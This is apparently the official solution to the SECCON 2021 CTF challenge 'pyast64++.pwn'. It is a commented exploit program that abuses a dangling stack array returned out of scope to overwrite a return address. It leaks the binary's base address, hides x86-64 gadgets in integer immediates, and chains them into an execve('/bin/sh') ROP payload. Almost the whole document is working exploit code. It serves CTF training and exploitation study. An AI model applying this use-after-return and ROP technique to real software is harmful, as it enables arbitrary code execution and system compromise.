Official solution for pyast64++.pwn from SECCON 2021
def get_overlap():
    # [vuln] Return a local array out-of-scope.
    # The array is allocated in this function's own frame (per the note
    # above, presumably on the stack — confirm against the compiler), so
    # the returned reference dangles: once this frame is popped, the
    # calls that follow in main (f1, then f2) reuse the same stack region
    # and every write through the returned array lands in their frames.
    # The real fix belongs in the compiler: reject, or heap-allocate,
    # arrays that escape the function that created them.
    return array(0x100)
def f1(evil):
    # Create padding for ROP chain.
    # x is deliberately unused: the 0xe0-byte array only shifts where
    # f2's frame lands, presumably so that the slots f2 writes through
    # `evil` (0x1b..0x23) line up with a saved return address. Removing
    # it or changing its size invalidates the offsets hard-coded in f2
    # (tuned for this build — confirm in a debugger).
    x = array(0xe0)
    f2(evil)
def gadgets():
    # Never called. Each bare integer is (presumably) compiled into the
    # binary as an immediate, and its little-endian bytes spell an
    # x86-64 gadget ending in `ret` (c3): e.g. 0x00c3d231 -> 31 d2 c3.
    # f2 jumps into the middle of those instructions; its addresses
    # (0x11ee, 0x11f4, ..., 0x1212) are 6 bytes apart, one per statement
    # below and in the same order. They are tied to this exact build of
    # the challenge binary: any change to the source or compiler shifts
    # them and the chain must be re-derived.
    0x00c3d231 # xor edx, edx; ret;
    0x00c3f631 # xor esi, esi; ret;
    0x00c35f50 # push rax; pop rdi; ret;
    0x00c3c031 # xor eax, eax; ret;
    0x00c33bb0 # mov al, 59; ret;
    0x00c3050f # syscall; ret;
    0x00c35a5a # pop rdx; pop rdx; ret
def f2(evil):
    # Prepare ROP chain.
    # `evil` is the dangling array from get_overlap(); after f1's padding
    # its slots overlap this call's stack, so the writes below overwrite
    # a saved return address and the words above it.
    #
    # evil[0x1b] holds a return address into the binary (code offset
    # 0x11d5 in this build); subtracting the offset leaks the PIE base.
    proc_base = evil[0x1b] - 0x11d5
    # Replace that return address with the first gadget. Given the
    # `push rax` gadget below, this is presumably f2's own return address
    # (so the chain fires with rax = this function's return value) —
    # confirm in a debugger. The two pops consume evil[0x1c]/evil[0x1d],
    evil[0x1b] = proc_base + 0x1212 # pop rdx; pop rdx; ret
    # skip evil pointer and type field
    # ... so the chain resumes at evil[0x1e].
    #
    # execve("/bin/sh", NULL, NULL): rax (binsh + 8, the string address)
    # is moved into rdi via push/pop, rsi and rdx are zeroed, rax is set
    # to SYS_execve (59), then syscall.
    evil[0x1e] = proc_base + 0x11fa # push rax; pop rdi; ret
    evil[0x1f] = proc_base + 0x11ee # xor edx, edx; ret
    evil[0x20] = proc_base + 0x11f4 # xor esi, esi; ret
    evil[0x21] = proc_base + 0x1200 # xor eax, eax; ret
    evil[0x22] = proc_base + 0x1206 # mov al, 59; ret
    evil[0x23] = proc_base + 0x120c # syscall; ret
    # "/bin/sh\0" as one little-endian qword (0x0068732f6e69622f),
    # assembled by multiplication presumably because the language cannot
    # express a 64-bit literal or a shift directly.
    binsh = array(1)
    binsh[0] = 0x0068732f * 0x10000 * 0x10000 + 0x6e69622f
    # Return a pointer to the string data: +8 skips the array header
    # (presumably the type field mentioned above). This value sits in rax
    # when the `ret` into the chain fires.
    return binsh + 8
def main():
    # Grab the dangling array, then call f1 so that f2's frame lands on
    # the memory it still references; f2 plants the ROP chain there and
    # the chain runs when that frame returns.
    evil = get_overlap()
    f1(evil)